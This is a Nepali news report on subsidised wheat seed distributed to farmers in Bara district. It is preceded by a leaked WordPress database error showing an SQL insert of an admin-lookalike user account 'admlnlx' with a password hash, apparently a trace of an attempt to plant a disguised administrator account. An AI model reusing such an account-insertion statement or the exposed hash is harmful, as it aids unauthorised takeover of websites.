WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Blqbi31IUjJGenKDyMOb6kY7MIVbO6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 22:24:19', '', 'admlnlx', 'admlnlx')
कलैया, पुस १३–
बारा जिल्लामा चालु आव ०७३/७४ का लागि गहुँखेती गर्न बीउबिजन कम्पनी हेटौँडाले दुई सय ५१ मेट्रिक टन गहुँको बीउ २२ डिलरमार्फत किसानलाई उपलब्ध गराएको छ ।
कम्पनीले उपलब्ध गराएको अनुदान बीउ करिब रु एक करोड १२ लाख ९५ हजार बराबरको छ । प्रजिअको अध्यक्षतामा रहेको बीउ आपूर्ति समितिको बैठकले जिल्लास्थित कृषि बीउ बिक्री डिलरमार्फत प्रतिकेजी रु ४५ का दरले किसानलाई उपलब्ध गराएको थियो ।
उपलब्ध भएको अनुदान गहुँ बीउको सदुपयोग भए÷नभएको अनुगमन कृषि विकास कार्यालयले गर्ने छ । यस वर्ष जिल्लामा करिब २८ हजार नौ सय हेक्टर क्षेत्रफलमा गहुँखेती गरिएको कृषि विकास कार्यालय बाराका प्रमुख शिवरत्न साहले बताउनुभयो । –रासस